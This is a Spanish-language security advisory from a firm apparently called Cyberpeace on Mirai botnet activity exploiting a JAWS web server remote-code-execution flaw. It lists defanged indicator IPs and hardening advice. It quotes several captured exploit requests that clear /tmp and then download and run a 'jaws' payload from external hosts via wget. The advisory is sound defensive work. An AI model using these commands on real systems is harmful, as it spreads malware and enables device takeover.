Mirai Botnet, quƩ es y porquƩ debes tener cuidado
top of page

Mirai Botnet, quƩ es y porquƩ debes tener cuidado

Actualizado: 28 sept 2023

El siguiente informe tiene como objetivo la notificación de actividad relacionada a la Botnet ā€œMirai Botnetā€ la cual presenta actividad en mĆŗltiples servicios de internet, atacando principalmente servidores expuestos por el protocolo HTTP.


Mirai Botnet

Mirai es una Botnet que infecta dispositivos inteligentes que funcionan con procesadores ARC, convirtiéndolos en una red de bots que pueden ser controlados remotamente para lanzar ataques distribuidos de denegación de servicio (DDoS), Mirai escanea las direcciones IP para identificar los dispositivos inteligentes que ejecutan una versión de Linux conocida como ARC.


En septiembre de 2016, los creadores del Malware Mirai lanzaron un ataque DDoS contra el sitio web de un conocido experto en seguridad. Una semana mÔs tarde sacaron a la luz el código fuente, posiblemente para intentar ocultar los orígenes de ese ataque.


Una vez liberada, Mirai se convirtió en una bola de nieve fuera de control, ya que fue replicada y modificada por otros ciberdelincuentes.


El código fuente de la botnet Mirai, publicado en la dark web, sigue evolucionando debido a que los creadores de Malware lo adaptan para crear variantes mÔs avanzadas de Mirai.

Las amenazas recientes de botnets de IoT, como Okiru, Satori y Reaper, se basan en el código fuente del Malware de Mirai.


El Malware Mirai escanea las direcciones IP para identificar los dispositivos inteligentes que ejecutan una versión de Linux conocida como ARC. Asimismo, aprovecha las vulnerabilidades de seguridad del dispositivo IoT para obtener acceso a la red a través de combinaciones predeterminadas de nombre de usuario y contraseña. Si estas configuraciones no se han cambiado o actualizado, Mirai puede iniciar sesión en el dispositivo e infectarlo con Malware.


A medida que aumenta el número de dispositivos atrapados en la red infectada, los ciberdelincuentes que la controlan utilizan las redes de bots Mirai para colapsar los sitios web o servidores objetivo bombardeÔndolos con mÔs trÔfico del que pueden soportar.


Mirai ha sido detectado por Cyberpeace realizando actividades maliciosas en la madrugada del 31 de agosto, y fue detectado por nuestras herramientas y equipo de trabajo, realizando posteriormente una investigación, relacionado a una vulnerabilidad de JAWS la cual si es explotada podría conducir a una ejecución de código remoto la cual se ha visualizado en peticiones HTTP solicitando recursos hacía direcciones IP maliciosas.


127.0.0[.]1/shell?cd+/tmp;rm+-rf+*;wget+94.158.247[.]123/jaws;sh+/tmp/jaws 127.0.0[.]1/shell?cd+/tmp;rm+-rf+*;wget+121.62.21[.]23/jaws;sh+/tmp/jaws

127.0.0[.]1/shell?cd+/tmp;rm+-rf+*;wget+ 81.161.229[.]185/jaws;sh+/tmp/jaws

127.0.0[.]1/shell?cd+/tmp;rm+-rf+*;wget+ 212.8.251[.]176/jaws;sh+/tmp/jaws


El comando se ejecuta en la misma maquina intentando cambiar el directorio actual a ā€œ/tmpā€ para despuĆ©s forzar para que sean borrados el contenido del directorio actual (ā€œ/tmpā€) siguiendo con el anĆ”lisis - **wget+94.158.247[.]123/jaws**; se utiliza para descargar archivos desde internet, realizando la solicitud HTTP a JAWS Remote Code Execution Exploit - HTTP, se trata de una ejecución remota de comandos en JAWS/1.0 web server desde la dirección ipv4 94.158.247.123 o como se ve relacionado con los comandos anteriores.


Las direcciones ip relacionadas son las siguientes:


  • 222.222.180[.]202

  • 94.158.247[.]123

  • 145.253.127[.]199

  • 81.161.229[.]185

  • 116.33.128[.]116

  • 121.62.21[.]23

  • 178.175.161[.]103

  • 113.65.131[.]103

  • 212.8.251[.]176

  • 223.13.125[.]214


Las cuales son IPs, que se recomienda agregar a dispositivos perimetrales para protección de la red administrada. Si encuentras este tipo de comandos en tu sistema, es importante tomar medidas de seguridad inmediatas, como aislar los equipos infectados de la infraestructura, escanear en busca de Malware, cambiar contraseñas y realizar un anÔlisis exhaustivo en el servidor.


Recomendaciones sobre Mirai Botnet


  • Cambia contraseƱas por defecto: Cambia las contraseƱas predeterminadas de tus dispositivos dentro de la infraestructura, incluidos enrutadores, cĆ”maras IP, impresoras, servidores, servidores con portales expuestos a internet, etc.

  • Actualiza regularmente: MantĆ©n tus dispositivos actualizados con los Ćŗltimos parches y firmware. Los fabricantes a menudo lanzan actualizaciones de seguridad para corregir vulnerabilidades conocidas.

  • Desactiva servicios innecesarios: Si un dispositivo tiene servicios o caracterĆ­sticas que no necesitas, desactĆ­valos. Esto reduce la superficie de ataque y disminuye las posibilidades de explotación.

  • Segmentación de red: Separa tus dispositivos en una red separada (VLAN) de tus dispositivos crĆ­ticos. Esto limita la propagación de posibles infecciones y aĆ­sla los dispositivos comprometidos.

  • Firewall y filtrado de trĆ”fico: Configura firewalls en tus dispositivos y redes para filtrar el trĆ”fico no deseado y bloquear conexiones sospechosas.

  • Monitorización de trĆ”fico: Utiliza herramientas de monitorización de red para detectar actividades anormales, como patrones de trĆ”fico inusuales que podrĆ­an indicar un posible ataque.

  • Desactiva UPnP: Universal Plug and Play (UPnP) puede abrir puertas traseras no deseadas en dispositivos. Desactiva esta función a menos que sea absolutamente necesaria.

  • Apaga dispositivos no utilizados: Si no necesitas un dispositivo IoT en un momento determinado, apĆ”galo. Esto reduce el tiempo de exposición a posibles amenazas.

  • Educación y concienciación: Educa a los usuarios sobre las mejores prĆ”cticas de seguridad cibernĆ©tica para dispositivos y la importancia de mantenerse alerta frente a amenazas potenciales.

  • Colocar los indicadores de compromiso adjuntados en el archivo IOC’s.xlsx y en las herramientas de seguridad perimetral.

Cyberpeace_Mesa de trabajo 1 copia 8.png

Cyberpeace Copyright © 2025 - All rights reserved.

TLP:CLEAR

bottom of page